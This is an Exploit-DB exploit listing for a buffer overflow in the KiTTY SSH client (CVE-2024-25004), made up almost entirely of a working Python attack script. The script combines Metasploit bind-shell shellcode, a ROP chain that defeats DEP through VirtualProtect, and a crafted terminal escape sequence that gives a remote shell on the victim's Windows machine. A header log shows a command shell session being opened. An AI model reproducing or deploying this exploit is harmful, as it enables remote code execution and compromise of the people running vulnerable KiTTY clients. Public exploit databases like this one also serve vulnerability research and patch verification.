KiTTY 0.76.1.13 – ‘Start Duplicated Session Username’ Buffer Overflow

  • 作者: DEFCESCO
    日期: 2024-03-14
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/51891/
  • # Exploit Title: KiTTY 0.76.1.13 - 'Start Duplicated Session Username' Buffer Overflow
    # Exploit Author: DEFCESCO (Austin A. DeFrancesco)
    # Vendor Homepage: https://github.com/cyd01/KiTTY/=
    # Software Link: https://github.com/cyd01/KiTTY/releases/download/v0.76.1.13/kitty-bin-0.76.1.13.zip
    # Version: ≤ 0.76.1.13
    # Tested on: Microsoft Windows 11/10/8/7/XP
    # CVE: CVE-2024-25004
    #-------------------------------------------------------------------------------------#
    # Blog: https://blog.DEFCESCO.io/Hell0+KiTTY
    #-------------------------------------------------------------------------------------#
    # msf6 payload(windows/shell_bind_tcp) > to_handler #
    # [*] Payload Handler Started as Job 1#
    # msf6 payload(windows/shell_bind_tcp) >#
    # [*] Started bind TCP handler against 192.168.100.28:4444#
    # [*] Command shell session 1 opened (192.168.100.119:34285 -> 192.168.100.28:4444) # 
    #-------------------------------------------------------------------------------------#
    
    import sys
    import os
    import struct
    
    #-------------------------------------------------------------------------------------#
    # msf6 payload(windows/shell_bind_tcp) > generate -b '\x00\x07\x0a\x0d\x1b\x9c' -f py #
    # windows/shell_bind_tcp - 355 bytes#
    # https://metasploit.com/ #
    # Encoder: x86/shikata_ga_nai #
    # VERBOSE=false, LPORT=4444, RHOST=192.168.100.28,#
    # PrependMigrate=false, EXITFUNC=process, CreateSession=true, #
    # AutoVerifySession=true#
    #-------------------------------------------------------------------------------------#
    
    buf =b""
    buf += b"\xd9\xe9\xd9\x74\x24\xf4\xbd\xfe\xb7\xa4\x99\x5e"
    buf += b"\x29\xc9\xb1\x53\x83\xee\xfc\x31\x6e\x13\x03\x90"
    buf += b"\xa4\x46\x6c\x90\x23\x04\x8f\x68\xb4\x69\x19\x8d"
    buf += b"\x85\xa9\x7d\xc6\xb6\x19\xf5\x8a\x3a\xd1\x5b\x3e"
    buf += b"\xc8\x97\x73\x31\x79\x1d\xa2\x7c\x7a\x0e\x96\x1f"
    buf += b"\xf8\x4d\xcb\xff\xc1\x9d\x1e\xfe\x06\xc3\xd3\x52"
    buf += b"\xde\x8f\x46\x42\x6b\xc5\x5a\xe9\x27\xcb\xda\x0e"
    buf += b"\xff\xea\xcb\x81\x8b\xb4\xcb\x20\x5f\xcd\x45\x3a"
    buf += b"\xbc\xe8\x1c\xb1\x76\x86\x9e\x13\x47\x67\x0c\x5a"
    buf += b"\x67\x9a\x4c\x9b\x40\x45\x3b\xd5\xb2\xf8\x3c\x22"
    buf += b"\xc8\x26\xc8\xb0\x6a\xac\x6a\x1c\x8a\x61\xec\xd7"
    buf += b"\x80\xce\x7a\xbf\x84\xd1\xaf\xb4\xb1\x5a\x4e\x1a"
    buf += b"\x30\x18\x75\xbe\x18\xfa\x14\xe7\xc4\xad\x29\xf7"
    buf += b"\xa6\x12\x8c\x7c\x4a\x46\xbd\xdf\x03\xab\x8c\xdf"
    buf += b"\xd3\xa3\x87\xac\xe1\x6c\x3c\x3a\x4a\xe4\x9a\xbd"
    buf += b"\xad\xdf\x5b\x51\x50\xe0\x9b\x78\x97\xb4\xcb\x12"
    buf += b"\x3e\xb5\x87\xe2\xbf\x60\x3d\xea\x66\xdb\x20\x17"
    buf += b"\xd8\x8b\xe4\xb7\xb1\xc1\xea\xe8\xa2\xe9\x20\x81"
    buf += b"\x4b\x14\xcb\xbc\xd7\x91\x2d\xd4\xf7\xf7\xe6\x40"
    buf += b"\x3a\x2c\x3f\xf7\x45\x06\x17\x9f\x0e\x40\xa0\xa0"
    buf += b"\x8e\x46\x86\x36\x05\x85\x12\x27\x1a\x80\x32\x30"
    buf += b"\x8d\x5e\xd3\x73\x2f\x5e\xfe\xe3\xcc\xcd\x65\xf3"
    buf += b"\x9b\xed\x31\xa4\xcc\xc0\x4b\x20\xe1\x7b\xe2\x56"
    buf += b"\xf8\x1a\xcd\xd2\x27\xdf\xd0\xdb\xaa\x5b\xf7\xcb"
    buf += b"\x72\x63\xb3\xbf\x2a\x32\x6d\x69\x8d\xec\xdf\xc3"
    buf += b"\x47\x42\xb6\x83\x1e\xa8\x09\xd5\x1e\xe5\xff\x39"
    buf += b"\xae\x50\x46\x46\x1f\x35\x4e\x3f\x7d\xa5\xb1\xea"
    buf += b"\xc5\xd5\xfb\xb6\x6c\x7e\xa2\x23\x2d\xe3\x55\x9e"
    buf += b"\x72\x1a\xd6\x2a\x0b\xd9\xc6\x5f\x0e\xa5\x40\x8c"
    buf += b"\x62\xb6\x24\xb2\xd1\xb7\x6c"
    
    
    def shellcode():
    	sc = b'' 
    	sc += b'\xBB\x44\x24\x44\x44' # movebx,0x44442444
    	sc += b'\xB8\x44\x44\x44\x44' # moveax,0x44444444
    	sc += b'\x29\xD8' # subeax,ebx
    	sc += b'\x29\xC4' # subesp,eax
    	sc += buf
    	sc += b'\x90' * (1042-len(sc))
    	assert len(sc) == 1042 
    	return sc
    
    
    def create_rop_chain():
    	# rop chain generated with mona.py - www.corelan.be
    	rop_gadgets = [
    	#[---INFO:gadgets_to_set_esi:---]
    	0x004c5832,# POP EAX # ADD ESP,14 # POP EBX # POP ESI # RETN [kitty.exe]
    	0x006424a4,# ptr to &VirtualProtect() [IAT kitty.exe]
    	0x41414141,# Filler (compensate)
    	0x41414141,# Filler (compensate)
    	0x41414141,# Filler (compensate)
    	0x41414141,# Filler (compensate)
    	0x41414141,# Filler (compensate)
    	0x41414141,# Filler (compensate)
    	0x41414141,# Filler (compensate)
    	0x00484e07,# MOV EAX,DWORD PTR DS:[EAX] # RETN [kitty.exe]
    	0x00473cf6,# XCHG EAX,ESI # RETN [kitty.exe]
    	#[---INFO:gadgets_to_set_ebp:---]
    	0x00429953,# POP EBP # RETN [kitty.exe]
    	0x005405b0,# PUSH ESP; RETN 0 [kitty.exe]
    	#[---INFO:gadgets_to_set_ebx:---]
    	0x0049d9f9,# POP EBX # RETN [kitty.exe]
    	0x00000201,# 0x00000201-> ebx
    	#[---INFO:gadgets_to_set_edx:---]
    	0x00430dce,# POP EDX # RETN [kitty.exe]
    	0x00000040,# 0x00000040-> edx
    	#[---INFO:gadgets_to_set_ecx:---]
    	0x005ac58c,# POP ECX # RETN [kitty.exe]
    	0x004d81d9,# &Writable location [kitty.exe]
    	#[---INFO:gadgets_to_set_edi:---]
    	0x004fa404,# POP EDI # RETN [kitty.exe]
    	0x005a2001,# RETN (ROP NOP) [kitty.exe]
    	#[---INFO:gadgets_to_set_eax:---]
    	0x004cd011,# POP EAX # POP EBX # RETN [kitty.exe]
    	0x90909090,# nop
    	0x41414141,# Filler (compensate)
    	#[---INFO:pushad:---]
    	0x005dfbac,# PUSHAD # RETN [kitty.exe]
    	]
    	return b''.join(struct.pack('<I', _) for _ in rop_gadgets)
    
    rop_chain = create_rop_chain()
    
    
    #----------------------------------------------------------------------------------#
    # Badchars: \x00\x07\x0a\x0d\x1b\x9c\x9d #
    # Return Address Information: 0x00529720 : {pivot 324 / 0x144} : #
    # ADD ESP,134 # POP EBX # POP ESI # POP EDI # POP EBP # RETN #
    # ** [kitty.exe] ** |startnull {PAGE_EXECUTE_READWRITE}#
    # Shellcode size at ESP: 1042 bytes#
    #----------------------------------------------------------------------------------#
    
    return_address = struct.pack('<I',0x00529720) # ADD ESP,134 # POP EBX # POP ESI # POP EDI # POP EBP # RETN** [kitty.exe] ** |startnull {PAGE_EXECUTE_READWRITE}
    
    rop_chain_padding = b'\x90' * 27
    nops = b'\x90' * 88
    
    escape_sequence = b'\033]0;__dt:localhost:' + shellcode() + return_address
    escape_sequence += rop_chain_padding + rop_chain
    escape_sequence += b'\xE9\x3D\xFA\xFF\xFF' # jmp $eip-1471
    escape_sequence += nops + b'\007'
    
    stdout = os.fdopen(sys.stdout.fileno(), 'wb') 
    stdout.write(escape_sequence)
    stdout.flush()